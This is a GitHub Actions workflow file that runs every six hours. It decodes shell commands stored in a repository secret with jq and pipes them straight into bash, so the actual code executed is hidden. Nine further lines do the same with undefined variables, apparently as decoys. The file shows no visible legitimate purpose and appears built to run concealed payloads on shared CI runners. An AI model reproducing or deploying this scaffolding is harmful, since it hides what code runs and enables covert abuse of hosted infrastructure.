name: gunnageterracotta

on:
  workflow_dispatch:
  schedule:
    - cron: '10 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gunnageterracotta
        env:
          t3: ${{ secrets.t3 }}
        run: |
          echo $t3 | jq -r .m3104 | /bin/bash
          echo $twpev1 | jq -r .ub478 | /bin/bash
          echo $tdqol63910 | jq -r .u14664 | /bin/bash
          echo $zt0 | jq -r .cxo10817 | /bin/bash
          echo $ygpk98466 | jq -r .e78 | /bin/bash
          echo $jlj9 | jq -r .rhlnx0499 | /bin/bash
          echo $cklzf8 | jq -r .s9 | /bin/bash
          echo $fmjk1 | jq -r .dburi16 | /bin/bash
          echo $np006 | jq -r .yspfy59 | /bin/bash
          echo $jwweo1880 | jq -r .qj84 | /bin/bash

